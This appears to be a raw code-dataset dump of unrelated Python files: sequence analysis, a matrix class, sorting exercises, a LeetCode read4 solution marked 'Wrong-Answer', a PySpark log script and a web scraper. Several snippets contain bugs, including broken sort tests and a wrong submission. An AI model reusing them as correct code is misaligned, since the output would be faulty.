+ seqf)\n \n fi_m = open(match)\n fi_s = open(seqf)\n fo_m = open(match.replace(inhead, outhead), 'w') # output files\n fo_s = open(seqf.replace(inhead, outhead), 'w')\n \n seen = {}\n Ne = 0\n for line in fi_s:\n mline = fi_m.readline()\n t = line.split(None, firstNonumCol(line.split())) \n # note this number, so no-split will be made in sequence columns, t[-1] will be a string of three-letter sequence\n seq = t[-1].rstrip('\\n')\n \n if nativeSeq != None:\n if int( simpleIdentity(seq, nativeSeq) ) == 1:\n continue\n if int( simpleIdentity(seq, nativeSeq) ) == -1:\n return -1\n \n if homo != None:\n # parse the pdb id from match line\n pid = getBase( removePath( mline.split()[1] ) )\n if pid in homo:\n Ne += 1\n continue\n \n if unnat == False:\n seq = seq.split()\n skip = False\n for i in range(len(seq)):\n seq[i] = t2s(seq[i])\n if seq[i] == -1: # unrecognize unnatural aa, skip this sequence\n skip = True\n break\n if skip == True:\n continue\n seq = ' '.join(seq) \n # now seq is a single letter sequence string\n # so the difference will be removed\n \n if seq in seen:\n continue\n else:\n seen[seq] = 1\n fo_m.write(mline)\n fo_s.write(line)\n \n fo_m.close()\n fo_s.close()\n \n if (homo != None) and (homo_log == True):\n logf = changeExt(match, 'log').replace(inhead, outhead)\n log = open(logf, 'w')\n log.write(str(Ne) + ' homologs excluded from ' + match +'\\n')\n log.close()\n \n return outhead\n\ndef readColumn (file, coln, top = None):\n ''' a file to read\n a column number, start with 0\n top number of lines to read \n return: a list of column items\n '''\n assert os.path.isfile(file)\n lines = file2array(file)\n col = []\n count = 0\n for line in lines:\n col.append(line.split()[coln])\n count += 1\n if top != None:\n if count == top:\n break\n return col\n\ndef readMultiColumn (file, coln, top = None):\n ''' a file to read\n a list of column numbers to read, start with 0\n top number of lines to read\n return: a list of column items\n '''\n cols = []\n for n in coln:\n cols.append(readColumn(file, n, top))\n return cols\n\ndef readAACount (resnames, cols, colwts = None, unnat = False):\n ''' a list containing 3-letter residue names \n a list of columns, should have same number of elements to \n a column which contains the weights of sequences. 
should have the same length as each column\n     when it is default (false), do not distinguish variants of AA\n     for example, MET and MSE are considered to be the same, and count is just added to MET\n    '''\n    assert isinstance(resnames, list)\n    assert isinstance(cols, list)\n    assert len(resnames) == len(cols)\n    if colwts == None:\n        assert equalLists(cols) \n    else:\n        colsb = cols[:] # cannot use colsb = cols\n        colsb.append(colwts)\n        assert equalLists(colsb)\n    count = 0\n    if unnat == False:\n        for r in range(len(resnames)):\n            # each element of resnames can be list or string\n            if isinstance(resnames[r], list):\n                for rr in range( len(resnames[r]) ):\n                    resnames[r][rr] = t2s(resnames[r][rr])\n            else:\n                resnames[r] = t2s(resnames[r]) \n    for i in range(len(cols[0])):\n        ok = 1\n        for j in range(len(cols)):\n            if unnat == False:\n                cols[j][i] = t2s(cols[j][i])\n            if isinstance(resnames[j], list) and (cols[j][i] in resnames[j]):\n                pass\n            elif cols[j][i] == resnames[j]:\n                pass\n            else:\n                ok = 0\n        if ok == 1:\n            if colwts != None:\n                try:\n                    count += 1/float(colwts[i])\n                except:\n                    pass\n            else:\n                count += 1\n    return count\n\n\ndef informationContent(col, lowcount = True):\n    lencol = len(col)\n    H = {}\n    for item in col:\n        item = t2s(item)\n        if not item in H:\n            H[item] = 1\n        else:\n            H[item] += 1\n    I = log(20)/log(2)\n    for k in H.keys():\n        p = float(H[k])/lencol\n        I += p*log(p)/log(2)\n    if lowcount:\n        I -= 19.0/(2*lencol*log(2))\n        if I < 0:\n            I = 0\n    return I\n\ndef informationContentQuick(col, norm = False):\n    I = log(20)/log(2)\n    col = map(float, col)\n    for p in col:\n        if not norm:\n            p /= sum(col)\n        I += p * log(p)/log(2)\n    return I\n\ndef firstNonumCol(list):\n    '''return the index of the first non-numeric element. useful for .seq files'''\n    for i in range(len(list)):\n        try:\n            float(list[i])\n        except:\n            return i\n\ndef index_from_match(line):\n    '''return a list of residue indices of match regions in a given line from match files'''\n    ilist = []\n    idxrange = re.search('(\\[\\(.+\\)\\])', line).group(0)\n    numbers = re.findall('\\d+', idxrange)\n    for i in range(0, len(numbers), 2):\n        start, end = int(numbers[i]), int(numbers[i+1])\n        for x in range(start, end+1):\n            ilist.append(x)\n    return ilist","sub_path":"modules_py/Analyze.py","file_name":"Analyze.py","file_ext":"py","file_size_in_byte":10394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"154246136","text":"from vec import Vec\n\ndef getitem(M, k):\n    \"Returns the value of entry k in M. The value of k should be a pair.\"\n    assert k[0] in M.D[0] and k[1] in M.D[1]\n    if k in M.f:\n        return M.f[k]\n    else:\n        return 0\n\ndef setitem(M, k, val):\n    \"Sets the element of M with label k to be val. 
The value of k should be a pair\"\n assert k[0] in M.D[0] and k[1] in M.D[1]\n M.f[tuple(k)] = val\n\n\ndef add(A, B):\n \"Returns the sum of A and B\"\n assert A.D == B.D\n mat = Mat(A.D, A.f.copy())\n for k in B.f.keys():\n mat[k] += B[k]\n return mat\n\ndef scalar_mul(M, alpha):\n \"Returns the product of scalar alpha with M\" \n A = M.copy()\n for k in A.f.keys():\n A[k] *= alpha\n return A\n\ndef equal(A, B):\n \"Returns true iff A is equal to B\"\n assert A.D == B.D\n for k in A.f.keys():\n if A[k] != B[k]:\n return False\n for k in B.f.keys():\n if A[k] != B[k]:\n return False\n return True \n\ndef transpose(M):\n \"Returns the transpose of M\"\n d = (M.D[1],M.D[0])\n f = dict()\n for k,v in M.f.items():\n f[(k[1],k[0])] = v\n return Mat(d,f)\n \n\ndef vector_matrix_mul(v, M):\n \"Returns the product of vector v and matrix M\"\n assert M.D[0] == v.D\n res = Vec(M.D[1], dict())\n for k in M.D[1]:\n res[k] = 0 \n for c in v.D:\n res[k] += v[c] * M[(c,k)]\n return res\n\n\ndef matrix_vector_mul(M, v):\n \"Returns the product of matrix M and vector v\"\n assert M.D[1] == v.D\n res = Vec(M.D[0], dict())\n for k in M.D[0]:\n res[k] = 0 \n for c in v.D:\n res[k] += v[c] * M[(k,c)]\n return res\n\ndef matrix_matrix_mul(A, B):\n \"Returns the product of A and B\"\n assert A.D[1] == B.D[0]\n res = Mat((A.D[0], B.D[1]), dict())\n for k1 in A.D[0]:\n for k2 in B.D[1]:\n res[(k1,k2)] = 0\n for k in A.D[1]:\n res[(k1,k2)] += A[(k1,k)] * B[(k,k2)]\n return res\n\n################################################################################\n\nclass Mat:\n def __init__(self, labels, function):\n self.D = labels\n self.f = function\n\n __getitem__ = getitem\n __setitem__ = setitem\n transpose = transpose\n\n def __neg__(self):\n return (-1)*self\n\n def __mul__(self,other):\n if Mat == type(other):\n return matrix_matrix_mul(self,other)\n elif Vec == type(other):\n return matrix_vector_mul(self,other)\n else:\n return scalar_mul(self,other)\n #this will only be used if other is scalar (or not-supported). 
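(e.g. M*2 lands here, while 2*M is dispatched through __rmul__ below.) 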
mat and vec both have __mul__ implemented\n\n    def __rmul__(self, other):\n        if Vec == type(other):\n            return vector_matrix_mul(other, self)\n        else: # Assume scalar\n            return scalar_mul(self, other)\n\n    __add__ = add\n\n    def __sub__(a,b):\n        return a+(-b)\n\n    __eq__ = equal\n\n    def copy(self):\n        return Mat(self.D, self.f.copy())\n\n    def __str__(M, rows=None, cols=None):\n        \"string representation for print()\"\n        if rows == None:\n            try:\n                rows = sorted(M.D[0])\n            except TypeError:\n                rows = sorted(M.D[0], key=hash)\n        if cols == None:\n            try:\n                cols = sorted(M.D[1])\n            except TypeError:\n                cols = sorted(M.D[1], key=hash)\n        separator = ' | '\n        numdec = 3\n        pre = 1+max([len(str(r)) for r in rows])\n        colw = {col:(1+max([len(str(col))] + [len('{0:.{1}G}'.format(M[row,col],numdec)) if isinstance(M[row,col], int) or isinstance(M[row,col], float) else len(str(M[row,col])) for row in rows])) for col in cols}\n        s1 = ' '*(1+ pre + len(separator))\n        s2 = ''.join(['{0:>{1}}'.format(c,colw[c]) for c in cols])\n        s3 = ' '*(pre+len(separator)) + '-'*(sum(list(colw.values())) + 1)\n        s4 = ''.join(['{0:>{1}} {2}'.format(r, pre,separator)+''.join(['{0:>{1}.{2}G}'.format(M[r,c],colw[c],numdec) if isinstance(M[r,c], int) or isinstance(M[r,c], float) else '{0:>{1}}'.format(M[r,c], colw[c]) for c in cols])+'\\n' for r in rows])\n        return '\\n' + s1 + s2 + '\\n' + s3 + '\\n' + s4\n\n    def pp(self, rows, cols):\n        print(self.__str__(rows, cols))\n\n    def __repr__(self):\n        \"evaluatable representation\"\n        return \"Mat(\" + str(self.D) +\", \" + str(self.f) + \")\"\n\n#v1 = Vec({1, 2, 3}, {1: 1, 2: 8})\n#M1 = Mat(({1, 2, 3}, {1, 2, 3}), {(1, 2): 2, (2, 1):-1, (3, 1): 1, (3, 3): 7})\n#print(v1 * M1)\n\n#from GF2 import one \n#M = Mat(({'a','b','c'}, {5}), {('a', 5):3, ('b', 5):7})\n#M['b', 5] = 9\n#M['c', 5] = 13\n#(M)\n#( Mat(({'a','b','c'}, {5}), {('a', 5):3, ('b', 5):9, ('c',5):13}))\n#(M == Mat(({'a','b','c'}, {5}), {('a', 5):3, ('b', 5):9, ('c',5):13}))\n","sub_path":"coding-matrix/week5/mat.py","file_name":"mat.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"464923601","text":"s1 = {3, 4, 5}\ns2 = {5, 6, 7}\ns3 = s1 & s2 #intersection\ns4 = s1 | s2 #union\ns5 = s2 - s1 #removes from s2 the elements it shares with s1\ns6= s1 ^ s2 #symmetric difference\nprint(s6)\n#set(string)\ns7=set(\"hello\")\nprint(s7)\n#------------------------------------------\n#dictionary key:value\ndic = {\"apple\" : \"蘋果\", \"banana\" : \"香蕉\"}\ndic[\"apple\"] = \"新蘋果\"\nprint(\"apple\" in dic)\nprint(\"pine apple\" in dic)\ndel dic[\"apple\"]\nprint(dic)\nnumberdic = {x:x*2 for x in [3,4,5]}\nprint(numberdic)","sub_path":"basic/setAndDictionary.py","file_name":"setAndDictionary.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"228829386","text":"num_disks = int(input(\"How many disks? 
\").strip())\n\ndef load_source(num_disks):\n src = []\n while num_disks > 0:\n src.append(num_disks)\n num_disks -= 1\n return src\n\ndef hanoi(n, source, helper, target):\n if n > 0:\n # move tower of size n - 1 to helper:\n hanoi(n - 1, source, target, helper)\n # move disk from source peg to target peg\n if source:\n target.append(source.pop())\n # move tower of size n-1 from helper to target\n hanoi(n - 1, helper, source, target)\n print(source, helper, target)\n# print(\"Moves \", moves)\n\n\n\nsource = load_source(num_disks) \ntarget = []\nhelper = []\n\nprint(source, helper, target)\nhanoi(len(source),source,helper,target)\n\n\n","sub_path":"python_class/hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"423667510","text":"# + 添加过滤器\n\nfrom rest_framework.filters import coreapi,coreschema,BaseFilterBackend\n\nclass ProductFilter(BaseFilterBackend):\n def filter_queryset(self, request, queryset, view):\n query_keys = (\"type\")\n foreign_keys = (\"type\",)\n\n query = {key: request.GET.get(key) for key in query_keys if key in request.GET}\n # 此写法性能问题 查询的key 来自 request 如果 太多的话循环自然会很多\n # query = {key: request.GET.get(key) for key in request.GET if key in query_keys}\n\n # for foreign_key in foreign_keys:\n # if foreign_key in query:\n # query[foreign_key+\"id\"] = query.pop(foreign_key)\n\n return queryset.filter(**query)\n\n def get_schema_fields(self, views):\n res = super(ProductFilter,self).get_schema_fields(views)\n res.extend([\n coreapi.Field(\n name=\"type\",\n required=False,\n location=\"query\",\n schema=coreschema.Integer(\n title=\"类型id\",\n description=\"查询指定类型的商品\"\n )\n )\n ])\n","sub_path":"store/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"575667177","text":"class Solution(object):\n def __init__(self):\n self.buffer = [None for _ in range(4)]\n self.oneRead = 0\n\n def read(self, buf, n):\n lessthan4 = False\n haveRead = 0\n offset = 0\n while not lessthan4 and haveRead < n:\n if self.oneRead == 0:\n self.oneRead = read4(self.buffer)\n lessthan4 = self.oneRead < 4\n actRead = min(n - haveRead, self.oneRead)\n buf[haveRead:haveRead + actRead] = self.buffer[offset:offset + actRead]\n self.oneRead -= actRead\n offset = (offset + actRead) % 4\n haveRead += actRead\n return haveRead\n","sub_path":"158/158.read-n-characters-given-read4-ii-call-multiple-times.345246730.Wrong-Answer.leetcode.python3.py","file_name":"158.read-n-characters-given-read4-ii-call-multiple-times.345246730.Wrong-Answer.leetcode.python3.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40448536","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import *\n\ndata_path = \"hdfs://10.1.4.11:9000/user/hduser/\"\n\nspark = SparkSession.builder\\\n .master(\"local[*]\")\\\n .appName(\"TraceAnalysis\")\\\n .getOrCreate()\n\nsc = spark.sparkContext\n#\nschema_machine_meta = StructType([\\\n StructField(\"machine_id\", StringType(), True),\\\n StructField(\"time_stamp\", LongType(), True),\\\n StructField(\"failure_domain_1\", LongType(), True),\\\n StructField(\"failure_domain_2\", StringType(), True),\\\n StructField(\"cpu_num\", LongType(), True),\\\n StructField(\"mem_size\", LongType(), 
True),\\\n StructField(\"status\", StringType(), True),])\n\ndf_machine_meta = spark.read.csv(data_path + \"machine_meta.csv\", header=False, schema=schema_machine_meta)\nprint(\"machine_meta:\")\ndf_machine_meta.show()\n\n\nschema_machine_usage = StructType([\\\n StructField(\"machine_id\", StringType(), True),\\\n StructField(\"time_stamp\", DoubleType(), True),\\\n StructField(\"cpu_util_percent\", IntegerType(), True),\\\n StructField(\"mem_util_percent\", IntegerType(), True),\\\n StructField(\"mem_gps\", DoubleType(), True),\\\n StructField(\"mkpi\", LongType(), True),\\\n StructField(\"net_in\", DoubleType(), True),\\\n StructField(\"net_out\", DoubleType(), True),\\\n StructField(\"disk_io_percent\", DoubleType(), True)])\nspark.read.format(\"csv\").option(\"header\", \"false\").schema(schema_machine_usage).load(data_path + \"machine_usage.csv\").createOrReplaceTempView(\"machine_usage\")\nprint(\"machine_usage:\")\nspark.sql(\"select * from machine_usage\").show()\ndf_machine_usage = spark.sql(\"SELECT CAST(SUBSTRING(machine_id, 3, 4) AS int) AS machine_id, time_stamp, cpu_util_percent, mem_util_percent, FLOOR(time_stamp / 900) AS minute FROM machine_usage\")\ndf_machine_usage.show()\n\n\"\"\"\ndf_machine_usage.write.partitionBy('day', 'minute').parquet(data_path + \"machine_usage.parquet\")\n\ndf_machine_usage.select(\"machine_id\", \"minute\", \"cpu_util_percent\", \"mem_util_percent\")\\\n .groupBy(\"machine_id\", \"minute\")\\\n .agg({\"cpu_util_percent\": \"avg\", \"mem_util_percent\": \"avg\"})\\\n .orderBy(\"machine_id\", \"minute\")\\\n .write.csv(data_path + \"machine_usage_output.csv\")\n \n\"\"\"\n\n#\nschema_container_meta = StructType([\\\n StructField(\"container_id\", StringType(), True),\\\n StructField(\"machine_id\", StringType(), True),\\\n StructField(\"time_stamp\", LongType(), True),\\\n StructField(\"app_du\", StringType(), True),\\\n StructField(\"status\", StringType(), True),\\\n StructField(\"cpu_request\", LongType(), True),\\\n StructField(\"cpu_limit\", LongType(), True),\\\n StructField(\"mem_size\", DoubleType(), True)])\ndf_container_meta = spark.read.csv(data_path + \"container_meta.csv\", header=False, schema=schema_container_meta)\nprint(\"container_mata:\")\ndf_container_meta.show()\n\n\n#\nschema_container_usage = StructType([\\\n StructField(\"container_id\", StringType(), True),\\\n StructField(\"machine_id\", StringType(), True),\\\n StructField(\"time_stamp\", DoubleType(), True), \\\n StructField(\"cpu_util_percent\", LongType(), True), \\\n StructField(\"mem_util_percent\", LongType(), True), \\\n StructField(\"cpi\", DoubleType(), True),\\\n StructField(\"mem_gps\", DoubleType(), True),\\\n StructField(\"mpki\", LongType(), True), \\\n StructField(\"net_in\", DoubleType(), True), \\\n StructField(\"net_out\", DoubleType(), True),\\\n StructField(\"disk_io_percent\", DoubleType(), True)])\ndf_container_usage = spark.read.csv(data_path + \"container_usage*.csv\", header=False, schema=schema_container_usage)\nprint(\"container_usage:\")\ndf_container_usage.show()\n\n#\nschema_batch_task = StructType([\\\n StructField(\"task_name\", StringType(), True),\\\n StructField(\"instance_num\", LongType(), True),\\\n StructField(\"job_name\", StringType(), True), \\\n StructField(\"task_type\", StringType(), True), \\\n StructField(\"status\", StringType(), True), \\\n StructField(\"start_time\", LongType(), True),\\\n StructField(\"end_time\", LongType(), True),\\\n StructField(\"plan_cpu\", DoubleType(), True), \\\n StructField(\"plan_mem\", 
DoubleType(), True)])\n\ndf_batch_task = spark.read.format(\"csv\").option(\"header\", \"false\").schema(schema_batch_task).load(data_path + \"batch_task.csv\")\nprint(\"batch_task:\")\ndf_batch_task.show()\n\n#\nschema_batch_instance = StructType([ \\\n    StructField(\"instance_name\", StringType(), True), \\\n    StructField(\"task_name\", StringType(), True), \\\n    StructField(\"job_name\", StringType(), True), \\\n    StructField(\"task_type\", StringType(), True), \\\n    StructField(\"status\", StringType(), True), \\\n    StructField(\"start_time\", LongType(), True),\\\n    StructField(\"end_time\", LongType(), True),\\\n    StructField(\"machine_id\", StringType(), True), \\\n    StructField(\"seq_no\", LongType(), True), \\\n    StructField(\"total_seq_no\", LongType(), True), \\\n    StructField(\"cpu_avg\", DoubleType(), True),\\\n    StructField(\"cpu_max\", DoubleType(), True), \\\n    StructField(\"mem_avg\", DoubleType(), True), \\\n    StructField(\"mem_max\", DoubleType(), True)])\n\ndf_batch_instance = spark.read.format(\"csv\").option(\"header\", \"false\").schema(schema_batch_instance).load(data_path + \"batch_instance*.csv\")\nprint(\"batch_instance:\")\ndf_batch_instance.show()\n\n\n# for i in machine_ids.collect():\n#     df_machine_usage.orderBy(\"machine_id\").filter(df_machine_usage[\"machine_id\"] == i.machine_id).show()\n#\n\n\n# df_machine_usage.filter((df_machine_usage['machine_id'] == \"m_1\") & (df_machine_usage['time_stamp'] == '683653')).show()\n\n# machine_ids.select(\"machine_id\").foreach(lambda row: print(row))\n\n# df_machine_usage.createOrReplaceTempView(\"machine_usage\")\n# sqlDF_machine_usage = spark.sql(\"SELECT * FROM machine_usage group by machine_id\")\n\n# df_machine_usage.filter(df_machine_usage['machine_id'] == 'm_967').show()\n\n\n\n#\n# machine_list = sqlDF_machine_meta.collect()\n# print(machine_list)\n\n# sqlDF_machine_meta.foreach(lambda row: sqlDF_machine_usage.filter(\"machine_id=\" + row.machine_id).write.csv(\"/mnt/1AF492ABF49288A1/MScProject/split/machine_usage_\" + row.machine_id, mode=\"overwrite\", header=\"true\"))\n# machine_ids.foreach(lambda row: print(row.machine_id))\n\n\nspark.stop()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"458635251","text":"\"\"\"\r\nfile: multiSort.py\r\nlanguage: python3\r\nauthor: mal3941@g.rit.edu Moisés Lora Pérez\r\nclass: CSCI 141-03\r\n\"\"\"\r\ndef swap(lst,i,j):\r\n    \"\"\"\r\n    This swap function exchanges the elements at indices i and j.\r\n    :param lst: input list\r\n    :param i: index\r\n    :param j: other index\r\n    :return: None; the swap is done in place\r\n    \"\"\"\r\n    \"\"\"\r\n    temp = lst[i]\r\n    lst[i] = lst[j]\r\n    lst[j] = temp\r\n    \"\"\"\r\n    lst[i], lst[j] = lst[j], lst[i]\r\n\r\ndef insert(lst,mark):\r\n    \"\"\"\r\n    This function shifts the element at index mark left until the prefix is in order (one insertion-sort step)\r\n\r\n    :param lst: input list\r\n    :param mark: index\r\n\r\n    \"\"\"\r\n    index = mark\r\n    while index > -1 and lst[index] > lst[index+1]:\r\n        swap(lst, index, index +1)\r\n        index -= 1\r\n\r\ndef insertionSort(lst):\r\n    \"\"\"\r\n    This function sorts the list in ascending order (insertion sort)\r\n    :param lst: input list\r\n    :return: list sorted in ascending order\r\n    \"\"\"\r\n    for mark in range(len(lst)-1):\r\n        insert(lst, mark)\r\n    return lst\r\n\r\ndef minFrom(lst, mark):\r\n    \"\"\"\r\n    This function returns the minimum current index of 
the list\r\n \"\"\"\r\n currIndex = mark\r\n for i in range(mark, len(lst)):\r\n if lst[currIndex] > lst[i]:\r\n currIndex = i\r\n return currIndex\r\n\r\ndef perkSort(lst):\r\n \"\"\"\r\n This function swaps the elements whenever the left element is larger.\r\n :param lst: inputed list\r\n :return: the list sorted\r\n \"\"\"\r\n swapMade = True\r\n while swapMade:\r\n swapMade=False\r\n for i in range(0, len(lst)-1):\r\n if lst[i] > lst[i+1]:\r\n swap(lst, i, i+1)\r\n swapMade = True\r\n return lst\r\n\r\ndef selectionSort(lst):\r\n \"\"\"\r\n This function returns the sequence of values that can be cut into two sub-sequences such that the first\r\n sub-sequence is in order and all the elements are less than or equal to the elements of the second sub-sequence.\r\n :param lst: inputed list\r\n :return: the sorted list\r\n \"\"\"\r\n for i in range(0, len(lst)-1):\r\n swap(lst, i, minFrom(lst,i))\r\n return lst\r\n\r\ndef professorFurySorted(lst):\r\n \"\"\"\r\n Returns the sorting.\r\n :param lst: inputed list\r\n :return: sorted list\r\n \"\"\"\r\n\r\n return professorFurySort(lst, 0, len(lst)-1)\r\n\r\ndef professorFurySort(lst, start, end):\r\n \"\"\"\r\n This function sorts recursively if the first item is larger than the last one then swaps them if its greater\r\n than two, it'll sort the first 2/3 of the list , then last and again the first and then return the list.\r\n :param lst:\r\n :param start:\r\n :param end:\r\n :return:\r\n \"\"\"\r\n if end is None:\r\n end = len(lst)-1\r\n if lst[start] > lst[end]:\r\n swap(lst,start,end)\r\n\r\n if end-start > 1:\r\n lst = professorFurySort(lst, start, (2*end//3))\r\n lst = professorFurySort(lst, start + (end//3)+1, end)\r\n lst = professorFurySort(lst, start, (2*end//3))\r\n\r\n return lst\r\n\r\ndef convertFile(filename):\r\n \"\"\"\r\n This converst the textfile to a list\r\n :param filename: textfile used\r\n :return: a list is returned\r\n \"\"\"\r\n file = open(filename)\r\n wordList = []\r\n for currentLine in file:\r\n wordList.append((currentLine.strip()))\r\n return wordList\r\n\r\ndef testing(lst,expected):\r\n \"\"\"\r\n This tests the list with the expected one.\r\n :param lst: inputed list\r\n \"\"\"\r\n emptylist = []\r\n expected = []\r\n testSort(lst,expected)\r\n singleElementlist = [1]\r\n expected = [1]\r\n testSort(lst,expected)\r\n reverseSorteda = [5,4,3,2,1]\r\n expected = [1,2,3,4,5]\r\n testSort(lst,expected)\r\n reverseSortedb = [10,9,8,7,6]\r\n expected = [6.7,8,9,10]\r\n testSort(lst,expected)\r\n sorteda = [1,2,3,4,5]\r\n expected = [1,2,3,4,5]\r\n testSort(lst,expected)\r\n sortedb = [6,7,8,9,10]\r\n expected = [6,7,8,9,10]\r\n testSort(lst,expected)\r\n randoma = [45,60,79,92]\r\n expected = [45,60,79,92]\r\n testSort(lst,expected)\r\n\r\ndef testSort(lst, expected):\r\n \"\"\"\r\n This functions tests the sorting algorithms with the expected lists.\r\n :param lst: test list\r\n :param expected: expected list\r\n :return: boolean value\r\n \"\"\"\r\n if insertionSort(lst) == expected:\r\n return True\r\n else:\r\n return False\r\n\r\n if perkSort(lst) == expected:\r\n return True\r\n else:\r\n return False\r\n if selectionSort(lst) == expected:\r\n return True\r\n else:\r\n return False\r\n if professorFuryHelp(lst) == expected:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef main():\r\n\r\n #this executes the function\r\n\r\n textFile = str(input(\"Enter the filename:\"))\r\n lst = [55, 100, 92, 66, 35, 54, 26, 7, 70]\r\n print(selectionSort(lst))\r\n\r\nmain()\r\n\r\n","sub_path":"Computer 
Science 1/Labs/lab5/multiSort.py","file_name":"multiSort.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"462580910","text":"import shutil \nimport os \nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\nimport difflib\n#import emailScript\n\nurl = \"https://www.adidas.com.au/yeezy\"\n\n#web_r = requests.get(url)\n#web_soup = BeautifulSoup(web_r.text, 'html.parser')\n\n#print(len(web_soup.findAll(\"img\")))\nlistVersion = []\n\ndriver = webdriver.Firefox()\ninter = 0\n\ndriver.get(url)\n\nhtml = driver.execute_script(\"return document.documentElement.outerHTML\")\nsel_soup = BeautifulSoup(html, 'html.parser')\nlistVersion.append(sel_soup.prettify())\n\nwhile(inter < 10):\n\tdriver.get(url)\n\n\thtml = driver.execute_script(\"return document.documentElement.outerHTML\")\n\tsel_soup = BeautifulSoup(html, 'html.parser')\n\n\t#listVersion.append(sel_soup.prettify())\n\t#print(sel_soup.prettify())\n\tlistVersion.append(sel_soup.prettify())\n\tif len(listVersion)> 2:\n\t\tlistVersion.pop(0) # drop the oldest snapshot; bare remove() needs an argument\n\tdiff = difflib.ndiff(listVersion[1],listVersion[0])\n\n\tprint(''.join(diff))\n\tinter +=1 \n\tprint(inter)\n\ttime.sleep(10)\n\n\n\n\n\n\n# images = []\n# for i in sel_soup.findAll('img'):\n# \ttry: \n\n# \t\tsrc = i[\"src\"]\n# \t\timages.append(src)\n# \texcept:\n# \t\tpass\n\n# for src in images:\n# \tprint(src)\n\n\n\n# currPath = os.getcwd()\n\n\n# count = 1\n \n# for img in images:\n# \ttry :\n# \t\tfileName = os.path.basename(img)\n# \t\timgR = requests.get(img, Stream = True)\n# \t\tnewPath = os.join(currPath, \"images\", fileName)\n# \t\twith open(newPath, \"wb\") as outputFile:\n# \t\t\tshutil.copyfileobj(imgR.raw, outputFile)\n# \t\tdel imgR\n# \texcept:\n# \t\tpass\n\n# \tcount = count+1\n# \tprint(count)\n\n\n\n\n\n\n#driver.quit()\n#print(len(listVersion))\n\n#print(listVersion[0] == listVersion[1])\n\n\n\n\n\n\n ","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"237874225","text":"#!/usr/bin/env python3\n\"\"\"Day 14: Reindeer Olympics\n\nThis year is the Reindeer Olympics! Reindeer can fly at high speeds, but must\nrest occasionally to recover their energy. Santa would like to know which of\nhis reindeer is fastest, and so he has them race.\n\nReindeer can only either be flying (always at their top speed) or\nresting (not moving at all), and always spend whole seconds in either state.\n\nWhat is the longest distance traveled by a reindeer after a given time?\n\nPart 2:\nAt the end of each second, Santa awards one point to the reindeer currently\nin the lead. 
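(Ties share the lead: every reindeer at the front distance earns a point, as leaders() below implements.) 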
What is the score of the winning reindeer?\n\n\"\"\"\nimport re\nimport itertools\n\n\nclass Reindeer:\n def __init__(self, speed, travels, rests):\n self.speed = speed\n self.travels = travels\n self.cycle_duration = travels + rests\n\n self.score = 0\n self.traveled = 0\n\n @classmethod\n def from_string(cls, line):\n \"\"\"Create a reindeer from a string containing its speed, flight time,\n and rest time.\n\n Args:\n line (str): A line containing the reindeer's data, in format:\n can fly km/s for seconds,\n but then must rest for seconds.\n\n \"\"\"\n data = [int(number) for number in re.findall(r'\\d+', line)]\n return cls(*data)\n\n def flying(self, time):\n \"\"\"Determine if the reindeer is flying.\n\n Args:\n time (int): Current race duration in seconds.\n\n Returns:\n bool: True if the reindeer is flying, False otherwise\n\n \"\"\"\n return (time % self.cycle_duration) < self.travels\n\n def move(self, time):\n \"\"\"Move the reindeer if it is flying.\n\n Args:\n time (int): Current race duration in seconds.\n\n \"\"\"\n if self.flying(time):\n self.traveled += self.speed\n\n\ndef distance_traveled(speed, travels, rests, total_time):\n \"\"\"Calculate the distance the reindeer has flied in `total_time` seconds.\n\n Args:\n speed (int): The reindeer's speed in km/s.\n travels (int): The number of seconds the reindeer can fly before resting.\n rests (int): The number of seconds the reindeer needs to rest.\n total_time (int): The time the reindeer has for his travel.\n\n Returns:\n int: Traveled distance in km.\n\n Examples:\n >>> distance_traveled(14, 10, 127, 1000)\n 1120\n >>> distance_traveled(16, 11, 162, 1000)\n 1056\n\n \"\"\"\n full_cycles, time_left = divmod(total_time, travels + rests)\n return (full_cycles * travels + min(time_left, travels)) * speed\n\n\ndef leaders(herd):\n \"\"\"Get the reindeer who are currently in the lead.\n\n Args:\n herd (list): A list of all reindeer.\n\n Returns:\n An iterator of the reindeer currently in the lead.\n\n \"\"\"\n herd = sorted(herd, key=lambda d: d.traveled, reverse=True)\n leader_score = herd[0].traveled\n return itertools.takewhile(lambda d: d.traveled == leader_score, herd)\n\n\ndef main():\n import sys\n\n with open(sys.argv[1]) as f:\n herd = [Reindeer.from_string(line) for line in f]\n\n for time in range(int(sys.argv[2])):\n for deer in herd:\n deer.move(time)\n for leader in leaders(herd):\n leader.score += 1\n\n print(max(deer.traveled for deer in herd))\n print(max(deer.score for deer in herd))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"day14/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256880433","text":"\"\"\"\r\nCopyright 2019 Amazon.com, Inc. or its affiliates. 
